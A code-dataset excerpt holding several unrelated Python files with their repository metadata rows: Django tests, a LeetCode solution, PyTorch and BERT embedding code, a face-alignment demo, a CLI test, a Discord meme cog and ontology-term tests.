assert models.TestModel1.objects.latest_approved().get().pk == sample_model.pk
assert (
models.TestModel1.objects.approved_up_to_transaction(transaction).get().pk
== unapproved_version.pk
)
def test_get_descriptions(sample_model):
descriptions = {
factories.TestModelDescription1Factory.create(described_record=sample_model)
for _ in range(2)
}
assert set(sample_model.get_descriptions()) == descriptions
def test_get_descriptions_with_update(sample_model, valid_user):
description = factories.TestModelDescription1Factory.create(
described_record=sample_model,
)
workbasket = factories.WorkBasketFactory.create()
new_description = description.new_version(workbasket)
description_queryset = sample_model.get_descriptions()
assert description in description_queryset
assert new_description not in description_queryset
description_queryset = sample_model.get_descriptions(
transaction=new_description.transaction,
)
assert new_description in description_queryset
assert description not in description_queryset
workbasket.submit_for_approval()
with patch(
"exporter.tasks.upload_workbaskets.delay",
):
workbasket.approve(valid_user)
description_queryset = sample_model.get_descriptions()
assert new_description in description_queryset
assert description not in description_queryset
def test_get_descriptions_with_request(request, sample_model):
description = factories.TestModelDescription1Factory.create(
described_record=sample_model,
)
workbasket = factories.WorkBasketFactory.create()
new_description = description.new_version(workbasket)
with patch("workbaskets.models.WorkBasket.current", return_value=workbasket):
description_queryset = sample_model.get_descriptions(request=request)
assert new_description in description_queryset
def test_get_description_dates(description_factory, date_ranges):
"""Verify that description models know how to calculate their end dates,
which should be up until the next description model starts or inifnite if
there is no later one."""
early_description = description_factory.create(
validity_start=date_ranges.adjacent_earlier.lower,
)
unrelated_description = description_factory.create(
# Note this doesn't share a described_record with above.
validity_start=date_ranges.adjacent_earlier.upper,
)
described_record = early_description.get_described_object()
current_description = description_factory.create(
**{early_description.described_object_field.name: described_record},
validity_start=date_ranges.normal.lower,
)
future_description = description_factory.create(
**{early_description.described_object_field.name: described_record},
validity_start=date_ranges.adjacent_later.lower,
)
objects = (
type(early_description)
.objects.filter(
**{early_description.described_object_field.name: described_record},
)
.with_end_date()
)
earlier = objects.as_at(date_ranges.adjacent_earlier.upper).get()
assert earlier.validity_end == date_ranges.adjacent_earlier.upper
assert earlier == early_description
current = objects.as_at(date_ranges.normal.upper).get()
assert current.validity_end == date_ranges.normal.upper
assert current == current_description
future = objects.as_at(date_ranges.adjacent_later.upper).get()
assert future.validity_end is None
assert future == future_description
def test_trackedmodel_str(trackedmodel_factory):
"""Verify no __str__ methods of TrackedModel classes crash or return non-
strings."""
instance = trackedmodel_factory.create()
result = instance.__str__()
assert isinstance(result, str)
assert len(result.strip())
def test_copy(trackedmodel_factory, approved_transaction):
"""Verify that a copy of a TrackedModel is a new instance with different
primary key and version group."""
instance: TrackedModel = trackedmodel_factory.create()
copy = instance.copy(approved_transaction)
assert copy.pk != instance.pk
assert copy.version_group != instance.version_group
@pytest.mark.parametrize(
("starting_sid", "expected_next_sid"),
(
(0, 1),
(10, 11),
),
)
def test_copy_increments_sid_fields(starting_sid, expected_next_sid):
instance = factories.TestModel1Factory.create(sid=starting_sid)
copy = instance.copy(factories.ApprovedTransactionFactory())
assert copy.sid == expected_next_sid
def test_copy_also_copies_dependents():
desc = factories.TestModelDescription1Factory.create()
copy = desc.described_record.copy(factories.ApprovedTransactionFactory())
assert copy.descriptions.count() == 1
assert copy.descriptions.get() != desc
assert copy.descriptions.get().description == desc.description
| 32.70276 | 98 | 0.738752 | 1,836 | 15,403 | 5.916667 | 0.152505 | 0.040504 | 0.032864 | 0.018411 | 0.436159 | 0.35736 | 0.30719 | 0.262543 | 0.227561 | 0.185124 | 0 | 0.008701 | 0.179251 | 15,403 | 470 | 99 | 32.77234 | 0.850577 | 0.129325 | 0 | 0.188742 | 0 | 0 | 0.018759 | 0.007413 | 0 | 0 | 0 | 0 | 0.175497 | 1 | 0.115894 | false | 0.003311 | 0.056291 | 0.009934 | 0.198676 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
652a688fb915a3b4f9d44a6dfea403cd79cc951b | 530 | py | Python | submissions/brick-wall/solution.py | Wattyyy/LeetCode | 13a9be056d0a0c38c2f8c8222b11dc02cb25a935 | [
"MIT"
] | null | null | null | submissions/brick-wall/solution.py | Wattyyy/LeetCode | 13a9be056d0a0c38c2f8c8222b11dc02cb25a935 | [
"MIT"
] | 1 | 2022-03-04T20:24:32.000Z | 2022-03-04T20:31:58.000Z | submissions/brick-wall/solution.py | Wattyyy/LeetCode | 13a9be056d0a0c38c2f8c8222b11dc02cb25a935 | [
"MIT"
] | null | null | null | # https://leetcode.com/problems/brick-wall
from collections import Counter
from itertools import accumulate
class Solution:
def leastBricks(self, wall: List[List[int]]) -> int:
cnt = Counter()
for row in wall:
cum_arr = list(accumulate(row))
for i, cum_sum in enumerate(cum_arr):
if i == len(cum_arr) - 1:
break
cnt[cum_sum] += 1
if len(cnt) == 0:
return len(wall)
return len(wall) - max(cnt.values())
| 26.5 | 56 | 0.549057 | 67 | 530 | 4.268657 | 0.537313 | 0.062937 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008596 | 0.341509 | 530 | 19 | 57 | 27.894737 | 0.810888 | 0.075472 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
652be6236409ee2b94f2985fd016d216879f52da | 1,183 | py | Python | models/embedding_learner.py | saiakhil0034/SimilarityLearning | 0b649e8ab48c065b35b656e3cc63a9f98897d857 | [
"MIT"
] | 1 | 2021-06-07T07:12:53.000Z | 2021-06-07T07:12:53.000Z | models/embedding_learner.py | saiakhil0034/SimilarityLearning | 0b649e8ab48c065b35b656e3cc63a9f98897d857 | [
"MIT"
] | null | null | null | models/embedding_learner.py | saiakhil0034/SimilarityLearning | 0b649e8ab48c065b35b656e3cc63a9f98897d857 | [
"MIT"
] | null | null | null | import torch.nn as nn
import torch.nn.functional as F
class EmbeddingNet(nn.Module):
def __init__(self, ni=128, no=64):
super(EmbeddingNet, self).__init__()
self.convnet = nn.Sequential(nn.Conv3d(ni, 128, 2, padding=2), nn.PReLU(),
nn.MaxPool3d(2, stride=1),
nn.Conv3d(128, 64, 2), nn.PReLU(),
nn.MaxPool3d(2, stride=1),
nn.Conv3d(64, 32, 2), nn.PReLU(),
nn.MaxPool3d(2, stride=1),
)
self.fc = nn.Sequential(nn.Linear(32 * 4 * 4 * 4, 256),
nn.PReLU(),
nn.Linear(256, 128),
nn.PReLU(),
nn.Linear(128, no)
)
def forward(self, x):
output = self.convnet(x)
output = output.view(output.size()[0], -1)
output = self.fc(output)
return output
def get_embedding(self, x):
with torch.no_grad():
return self.forward(x)
| 36.96875 | 82 | 0.415892 | 125 | 1,183 | 3.856 | 0.336 | 0.072614 | 0.093361 | 0.062241 | 0.201245 | 0.201245 | 0.201245 | 0.201245 | 0.145228 | 0.145228 | 0 | 0.082409 | 0.46661 | 1,183 | 31 | 83 | 38.16129 | 0.681458 | 0 | 0 | 0.192308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
652cc0cbc9523326d712b0adc3a64238b88584e2 | 1,339 | py | Python | examples/video_face_detect.py | ashuk203/face-alignment | 1f6452ae05ede0db9bbc48331d67d8b239fa9994 | [
"BSD-3-Clause"
] | 1 | 2020-12-09T13:08:49.000Z | 2020-12-09T13:08:49.000Z | examples/video_face_detect.py | ashuk203/face-alignment | 1f6452ae05ede0db9bbc48331d67d8b239fa9994 | [
"BSD-3-Clause"
] | null | null | null | examples/video_face_detect.py | ashuk203/face-alignment | 1f6452ae05ede0db9bbc48331d67d8b239fa9994 | [
"BSD-3-Clause"
] | null | null | null | import sys
sys.path.append('..')
import face_alignment
import cv2
import numpy as np
import torch
import time
import matplotlib.pyplot as plt
# Reading in frames of video
cap = cv2.VideoCapture('../test/assets/head-pose-face-detection-female.mp4')
frames = []
while True:
success, frame = cap.read()
if not success:
break
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frames.append(frame)
# Initializing landmarking model
fa = face_alignment.FaceAlignment(face_alignment.LandmarksType._2D, device='cpu', face_detector='blazeface')
# Finding landmarks for a single frame
preds = fa.get_landmarks_from_image(frames[0])
plt.imshow(frames[0])
for detection in preds:
try:
plt.scatter(detection[:,0], detection[:,1], 2)
except:
print(type(detection))
# Finding landmarks in a batch of frames
batch = np.stack(frames)
batch = batch.transpose(0, 3, 1, 2)
batch = torch.Tensor(batch[:2])
t_start = time.time()
preds = fa.get_landmarks_from_batch(batch)
print(f'BlazeFace: Execution time for a batch of 2 images: {time.time() - t_start}')
fig = plt.figure(figsize=(10, 25))
for i, pred in enumerate(preds):
plt.subplot(5, 2, i + 1)
plt.imshow(frames[i])
plt.title(f'frame[{i}]')
for detection in pred:
plt.scatter(detection[:,0], detection[:,1], 2)
plt.show()
| 23.086207 | 108 | 0.697535 | 199 | 1,339 | 4.623116 | 0.457286 | 0.042391 | 0.021739 | 0.041304 | 0.117391 | 0.067391 | 0.067391 | 0 | 0 | 0 | 0 | 0.025135 | 0.168036 | 1,339 | 57 | 109 | 23.491228 | 0.800718 | 0.099328 | 0 | 0.052632 | 0 | 0 | 0.123231 | 0.041632 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.184211 | 0 | 0.184211 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
652f564253631dba4dc78d4b0682c98970fe8f42 | 2,666 | py | Python | src/figcli/test/cli/dev/put.py | figtools/figgy-cli | 88f4ccb8221ef9734f95b2637acfacc6e00983e7 | [
"Apache-2.0"
] | 36 | 2020-07-21T21:22:02.000Z | 2021-10-20T06:55:47.000Z | src/figcli/test/cli/dev/put.py | figtools/figgy-cli | 88f4ccb8221ef9734f95b2637acfacc6e00983e7 | [
"Apache-2.0"
] | 2 | 2020-10-29T12:49:15.000Z | 2021-04-29T01:12:05.000Z | src/figcli/test/cli/dev/put.py | figtools/figgy-cli | 88f4ccb8221ef9734f95b2637acfacc6e00983e7 | [
"Apache-2.0"
] | null | null | null | import pexpect
from figcli.test.cli.actions.delete import DeleteAction
from figcli.test.cli.config import *
from figcli.test.cli.figgy import FiggyTest
from figcli.utils.utils import *
import sys
class DevPut(FiggyTest):
def __init__(self, extra_args=""):
print(f"Testing `figgy config {put.name} --env {DEFAULT_ENV}`")
super().__init__(pexpect.spawn(f'{CLI_NAME} config {put.name} '
f'--env {DEFAULT_ENV} --skip-upgrade {extra_args}', timeout=45, encoding='utf-8'),
extra_args=extra_args)
def run(self):
self.step(f"Testing PUT for {param_1}")
self.add(param_1, param_1_val, param_1_desc)
delete = DeleteAction(extra_args=self.extra_args)
delete.delete(param_1, check_delete=True)
def add(self, key, value, desc, delete_first=True, add_more=False):
if delete_first:
delete = DeleteAction(extra_args=self.extra_args)
delete.delete(key)
self.expect('.*Please input a PS Name.*')
self.sendline(key)
self.expect('.*Please input a value.*')
self.sendline(value)
self.expect('.*Please input an optional.*')
self.sendline(desc)
self.expect('.*secret?.*')
self.sendline('n')
self.expect('.*another.*')
if add_more:
self.sendline('y')
else:
self.sendline('n')
def add_encrypt_app(self, key, value, desc, add_more=False):
delete = DeleteAction(extra_args=self.extra_args)
delete.delete(key)
self.expect('.*Please input a PS Name.*')
self.sendline(key)
self.expect('.*Please input a value.*')
self.sendline(value)
self.expect('.*Please input an optional.*')
self.sendline(desc)
self.expect('.*secret?.*')
self.sendline('y')
index = self.expect(['.*key.*', '.*another.*'])
if index == 0:
self.sendline('app')
self.expect('.*another.*')
if add_more:
self.sendline('y')
else:
self.sendline('n')
def add_another(self, key, value, desc, add_more=True):
print(f"Adding another: {key} -> {value}")
self.expect('.*PS Name.*')
self.sendline(key)
self.expect('.*Please input a value.*')
self.sendline(value)
self.expect('.*Please input an optional.*')
self.sendline(desc)
self.expect('.*secret?.*')
self.sendline('n')
self.expect('.*Add another.*')
if add_more:
self.sendline('y')
else:
self.sendline('n')
| 33.746835 | 121 | 0.571268 | 322 | 2,666 | 4.60559 | 0.220497 | 0.153742 | 0.086312 | 0.113284 | 0.57586 | 0.57586 | 0.544842 | 0.544842 | 0.544842 | 0.509777 | 0 | 0.004695 | 0.280945 | 2,666 | 78 | 122 | 34.179487 | 0.76891 | 0 | 0 | 0.617647 | 0 | 0 | 0.191298 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073529 | false | 0 | 0.088235 | 0 | 0.176471 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
652fa4f6c3ff3934bf17b164b8e1f7ca3db6f25c | 2,111 | py | Python | tklearn/embedding/bert.py | aethersoft/textkit-learn | 8b25b19d394fb361dde4427ed3b84d63552b7cc8 | [
"MIT"
] | 4 | 2018-10-23T01:49:55.000Z | 2022-02-21T18:35:09.000Z | tklearn/embedding/bert.py | ysenarath/textkit-learn | 06f7b68acd24332485296bc94d9be4cd06ca1f0d | [
"MIT"
] | null | null | null | tklearn/embedding/bert.py | ysenarath/textkit-learn | 06f7b68acd24332485296bc94d9be4cd06ca1f0d | [
"MIT"
] | null | null | null | import torch
from transformers import BertTokenizer, BertModel
from sklearn.base import BaseEstimator, TransformerMixin
__all__ = [
'BertEmbedding'
]
class BertEmbedding(BaseEstimator, TransformerMixin):
"""Bert is contextual word embedding. This is different from normal word embeddings that it requires entire
sentence to return embedding for a given word based on the context of that word."""
def __init__(self, use_mask_token=False):
"""Constructs Bert model."""
self.tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
self.model = BertModel.from_pretrained('bert-base-uncased', return_dict=True)
self.use_mask_token = use_mask_token
def fit(self, X, y=None):
"""Does nothing and return self.
Parameters
----------
X
Input features
y
Labels
Returns
-------
returns self.
"""
return self
def transform(self, X):
"""Transforms input to word embedding matrix.
Parameters
----------
X
Input features
Returns
-------
Returns embedding tensor.
"""
return self.get_embedding(X)
def get_embedding(self, x, index=None):
"""Extracts and returns sentence embedding for input sentence.
Parameters
----------
x
Iterable of tokenized sentences.
index
Index of the word to extract the word embedding. Index starts with one.
Returns
-------
Array of features for each sentences.
"""
tokens = self.tokenizer(x, return_tensors="pt", is_pretokenized=True, add_special_tokens=True, padding=True,
truncation=True, max_length=512)
output = self.model(**tokens).last_hidden_state.cpu().detach().numpy()
if self.use_mask_token:
index = torch.where(tokens == self.tokenizer.mask_token_id)[1]
if index is not None:
return output[:, index, :]
return output
| 29.319444 | 116 | 0.595926 | 229 | 2,111 | 5.362445 | 0.445415 | 0.036645 | 0.039088 | 0.039088 | 0.047231 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002736 | 0.307437 | 2,111 | 71 | 117 | 29.732394 | 0.837209 | 0.344387 | 0 | 0 | 0 | 0 | 0.043478 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653008e4c994353e972f1759bbe391729b9632a5 | 768 | py | Python | na_zywo/20141112_brudnopis.py | CodeCarrots/warsztaty | ee5e3db728fd7154953041f8aca88a97aacf960b | [
"CC0-1.0"
] | 2 | 2015-01-10T21:20:43.000Z | 2015-05-23T05:07:15.000Z | na_zywo/20141112_brudnopis.py | CodeCarrots/warsztaty | ee5e3db728fd7154953041f8aca88a97aacf960b | [
"CC0-1.0"
] | null | null | null | na_zywo/20141112_brudnopis.py | CodeCarrots/warsztaty | ee5e3db728fd7154953041f8aca88a97aacf960b | [
"CC0-1.0"
] | null | null | null | #lista = []
#lista = list()
#print(type(lista), '---')
#krotka = tuple()
#krotka = (1,2,3)
#print(type(krotka), hash(krotka))
##krotka[0] = '?'
#slow = dict()
#slow = {
# 1: 2,
# 2: 3,
#}
#slow = dict(a=2, b=3)
#zbior = set()
#zbior = set([])
#zbior = set([1,2,3,4])
#zbior = {1,2,3,4}
#print(zbior, type(zbior), '---')
#lista = [(1,1),(2,1),(1,3),(4,1),]
#print(lista)
#wartosc = lista.sort()
#print(type(wartosc))
#print(lista)
#dc = {
# True: 1,
# (0, 0): 2,
# 'wewe': {},
#}
#print (dc)
#dc['wewe'] = True
#print (dc)
#print (dc['wewe'])
#print (dc['wewe2'])
zbior_a = set()
zbior_a.add(1)
zbior_a.add(1)
zbior_a.add(1)
zbior_a.add(2)
print(zbior_a)
zbior_b = {1,3,4,5,6}
#help(zbior_a)
print (zbior_b & zbior_a)
import turtle
turtle.Turtle()
| 12.8 | 35 | 0.549479 | 131 | 768 | 3.145038 | 0.229008 | 0.116505 | 0.087379 | 0.072816 | 0.09466 | 0.09466 | 0.09466 | 0.09466 | 0.09466 | 0.09466 | 0 | 0.062208 | 0.16276 | 768 | 59 | 36 | 13.016949 | 0.578538 | 0.670573 | 0 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6530f69a9d6c0f0ab965c8079057603341bbe2a8 | 499 | py | Python | vsutillib/vsutillib-pyqt6/vsutillib/pyqt6/classes/QMenuWidget.py | akai10tsuki/vsutillib | 6d623171cc2a5c66a94fb508bfc312abeab49ff2 | [
"MIT"
] | null | null | null | vsutillib/vsutillib-pyqt6/vsutillib/pyqt6/classes/QMenuWidget.py | akai10tsuki/vsutillib | 6d623171cc2a5c66a94fb508bfc312abeab49ff2 | [
"MIT"
] | null | null | null | vsutillib/vsutillib-pyqt6/vsutillib/pyqt6/classes/QMenuWidget.py | akai10tsuki/vsutillib | 6d623171cc2a5c66a94fb508bfc312abeab49ff2 | [
"MIT"
] | null | null | null | """
subclass of QMenu to save title
used in internationalization
"""
#from PySide2.QtWidgets import QMenu
from PySide6.QtWidgets import QMenu
class QMenuWidget(QMenu):
"""Override QMenu __init__ to save title"""
def __init__(self, title=None, titlePrefix=None, titleSuffix=None):
super().__init__(title)
self.originaltitle = title
self.titlePrefix = "" if titlePrefix is None else titlePrefix
self.titleSuffix = "" if titleSuffix is None else titleSuffix
| 27.722222 | 71 | 0.719439 | 59 | 499 | 5.881356 | 0.474576 | 0.034582 | 0.063401 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004988 | 0.196393 | 499 | 17 | 72 | 29.352941 | 0.860349 | 0.268537 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6532ff0967a9b39489f5fb868f45e33c221764c0 | 2,332 | py | Python | strops/utils/management/commands/initdata.py | ckoerber/strops | 2131354fd6822b3aa7b7d9c3c0db79723b06b8ca | [
"BSD-3-Clause"
] | 1 | 2020-12-29T19:57:47.000Z | 2020-12-29T19:57:47.000Z | strops/utils/management/commands/initdata.py | ckoerber/strops | 2131354fd6822b3aa7b7d9c3c0db79723b06b8ca | [
"BSD-3-Clause"
] | 13 | 2020-06-29T11:15:59.000Z | 2021-09-22T19:18:36.000Z | strops/utils/management/commands/initdata.py | ckoerber/strops | 2131354fd6822b3aa7b7d9c3c0db79723b06b8ca | [
"BSD-3-Clause"
] | null | null | null | """Command line script to initial data to the db."""
from re import compile, MULTILINE
from os import path
from logging import getLogger, DEBUG
from django.core.management.base import BaseCommand, CommandError
from strops.config.settings import ROOT_DIR
from strops.operators.models import Operator, Field
from strops.operators.scripts import run_all as run_all_op_scripts
from strops.schemes.scripts import run_all as run_all_scheme_scripts
from strops.schemes.models import ExpansionScheme, ExpansionParameter, OperatorRelation
from strops.references.scripts import insert_inspirehep_entries
LOGGER = getLogger("strops")
PAT = compile(r"\s+", MULTILINE)
class Command(BaseCommand):
"""Command line script to initial data to the db."""
help = (
"Add fields, operators, schemes and relations to the db."
" Needs to start on a clean db state."
)
papers_file = path.join(ROOT_DIR, "strops", "references", "data", "papers.txt")
tables = [
Operator,
Field,
ExpansionScheme,
ExpansionParameter,
OperatorRelation,
]
def add_arguments(self, parser):
"""Adds `inspires_ids` argument."""
def handle(self, *args, **options):
"""Runs `insert_inspirehep_entries` on all provided ids."""
verbosity = int(options["verbosity"])
if verbosity > 1:
LOGGER.setLevel(DEBUG)
for table in self.tables:
if table.objects.first():
raise CommandError(
"This command should only be run on empty databases."
" However, the table %s contains data." % table
)
self.read_ids()
run_all_op_scripts()
run_all_scheme_scripts()
def read_ids(self):
"""Reads inspirehep ids from papers file."""
LOGGER.info("Reading papers into db.")
ids = []
with open(self.papers_file, "r") as inp:
text = inp.read()
text = PAT.sub(" ", text.replace(",", " "))
ids += [idx for idx in text.split(" ") if idx]
LOGGER.info("Parsing inspirehep.net ids %s", ids)
n_created, errors = insert_inspirehep_entries(ids)
for error in errors:
LOGGER.exception(error)
LOGGER.info("Created %d new entries", n_created)
| 31.093333 | 87 | 0.638937 | 282 | 2,332 | 5.177305 | 0.432624 | 0.041096 | 0.014384 | 0.026027 | 0.087671 | 0.087671 | 0.087671 | 0.050685 | 0.050685 | 0 | 0 | 0.000581 | 0.261578 | 2,332 | 74 | 88 | 31.513514 | 0.847271 | 0.092624 | 0 | 0 | 0 | 0 | 0.146411 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.196078 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6533b935e14731be5963102ecb9975b4d55ca072 | 2,623 | py | Python | bot/cogs/meme_cog.py | sreekaransrinath/TearDrops | eaee0e63ddb1a862f7d4edd6c02b5136842fd9df | [
"MIT"
] | null | null | null | bot/cogs/meme_cog.py | sreekaransrinath/TearDrops | eaee0e63ddb1a862f7d4edd6c02b5136842fd9df | [
"MIT"
] | null | null | null | bot/cogs/meme_cog.py | sreekaransrinath/TearDrops | eaee0e63ddb1a862f7d4edd6c02b5136842fd9df | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands, tasks
import aiohttp
from .utils import COLOR
# Map of channel IDs to tasks.Loop automeme loops
automeme_loops = {}
async def automeme_routine(ctx):
'''sends a meme every 10 mins'''
async with aiohttp.ClientSession() as session:
url = "https://meme-api.herokuapp.com/gimme"
async with session.get(url) as response:
response = await response.json()
embed = discord.Embed(
title=response['title'],
url=response['postLink'],
color=COLOR.JOY)
embed.set_image(url=response['url'])
embed.set_footer(
text=f"r/{response['subreddit']} | Requested by {ctx.author.name} | Enjoy your dank memes!")
await ctx.send(embed=embed)
class Meme(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command(aliases=['meme'])
async def memes(self, ctx, param: str = None):
sub = '/' if param is None else '/' + str(param)
async with aiohttp.ClientSession() as session:
url = "https://meme-api.herokuapp.com/gimme" + sub
async with session.get(url) as response:
response = await response.json()
embed = discord.Embed(
title=response['title'],
url=response['postLink'],
color=COLOR.JOY)
embed.set_image(url=response['url'])
txt = f"r/{response['subreddit']} | Requested by {ctx.author.name} | Enjoy your dank memes"
embed.set_footer(text=txt)
await ctx.send(embed=embed)
@commands.command()
async def automeme(self, ctx):
'''Triggers the automeme taskloop for the channel context'''
channel_id = ctx.channel.id
if channel_id in automeme_loops:
await ctx.send('Automeme already running here')
else:
# using decorator instead of tasks.Loop directly to preserve
# default arguments
loop = tasks.loop(seconds=600)(automeme_routine)
automeme_loops[channel_id] = loop
loop.start(ctx)
@commands.command()
async def automeme_cancel(self, ctx):
'''Cancel the Automeme task in the current channel'''
channel_id = ctx.channel.id
if channel_id not in automeme_loops:
await ctx.send('Automeme not running here')
else:
automeme_loops[channel_id].cancel()
del automeme_loops[channel_id]
await ctx.send('Automeme canceled here')
def setup(client):
client.add_cog(Meme(client))
| 35.445946 | 104 | 0.611514 | 318 | 2,623 | 4.965409 | 0.327044 | 0.051298 | 0.037999 | 0.037999 | 0.509183 | 0.442052 | 0.442052 | 0.39772 | 0.357188 | 0.357188 | 0 | 0.002651 | 0.280976 | 2,623 | 73 | 105 | 35.931507 | 0.834571 | 0.047274 | 0 | 0.428571 | 0 | 0.035714 | 0.149362 | 0.021277 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.071429 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65340349d8b03cded222f98e67e8a453401833b1 | 5,196 | py | Python | common/data_refinery_common/models/test_ontology_term.py | AlexsLemonade/refinebio | 52f44947f902adedaccf270d5f9dbd56ab47e40a | [
"BSD-3-Clause"
] | 106 | 2018-03-05T16:24:47.000Z | 2022-03-19T19:12:25.000Z | common/data_refinery_common/models/test_ontology_term.py | AlexsLemonade/refinebio | 52f44947f902adedaccf270d5f9dbd56ab47e40a | [
"BSD-3-Clause"
] | 1,494 | 2018-02-27T17:02:21.000Z | 2022-03-24T15:10:30.000Z | common/data_refinery_common/models/test_ontology_term.py | AlexsLemonade/refinebio | 52f44947f902adedaccf270d5f9dbd56ab47e40a | [
"BSD-3-Clause"
] | 15 | 2019-02-03T01:34:59.000Z | 2022-03-29T01:59:13.000Z | from unittest.mock import patch
from django.test import TestCase
import vcr
from data_refinery_common.models.ontology_term import OntologyTerm, get_human_readable_name_from_api
class TestOntologyTerm(TestCase):
@vcr.use_cassette("/home/user/data_store/cassettes/common.ontology_term.import_from_api.yaml")
def test_get_or_create_from_api_fetches(self):
self.assertEqual(
"month", OntologyTerm.get_or_create_from_api("UO:0000035").human_readable_name
)
@vcr.use_cassette("/home/user/data_store/cassettes/common.ontology_term.invalid.yaml")
def test_get_or_create_invalid_term(self):
self.assertRaises(ValueError, OntologyTerm.get_or_create_from_api, "UO:9999999")
@patch("data_refinery_common.models.ontology_term.get_human_readable_name_from_api")
def test_get_or_create_from_api_returns_cached(self, mock_api_call):
mock_api_call.return_value = "medulloblastoma"
self.assertEqual(
"medulloblastoma",
OntologyTerm.get_or_create_from_api("EFO:0002939").human_readable_name,
)
mock_api_call.assert_called_once_with("EFO:0002939")
mock_api_call.reset_mock()
self.assertEqual(
"medulloblastoma",
OntologyTerm.get_or_create_from_api("EFO:0002939").human_readable_name,
)
mock_api_call.assert_not_called()
@vcr.use_cassette(
"/home/user/data_store/cassettes/common.ontology_term.import_entire_ontology.yaml"
)
@patch("data_refinery_common.models.ontology_term.get_human_readable_name_from_api")
def test_import_entire_ontology(self, mock_api_call):
# We shouldn't be hitting the API at all here, because we should have
# the ontology already imported
mock_api_call.return_value = "The wrong answer"
# I used the UO ontology here because it is much smaller than other important
# ontologies like EFO, which could take upwards of a minute to download and parse
created_terms = OntologyTerm.import_entire_ontology("uo")
self.assertEqual(
OntologyTerm.objects.all().count(),
559, # Since we are using a VCR, this number should not change until we refresh it
)
self.assertEqual(OntologyTerm.objects.all().count(), created_terms)
self.assertEqual(
"month", OntologyTerm.get_or_create_from_api("UO:0000035").human_readable_name
)
mock_api_call.assert_not_called()
@vcr.use_cassette("/home/user/data_store/cassettes/common.ontology_term.import_cl.yaml")
@patch("data_refinery_common.models.ontology_term.get_human_readable_name_from_api")
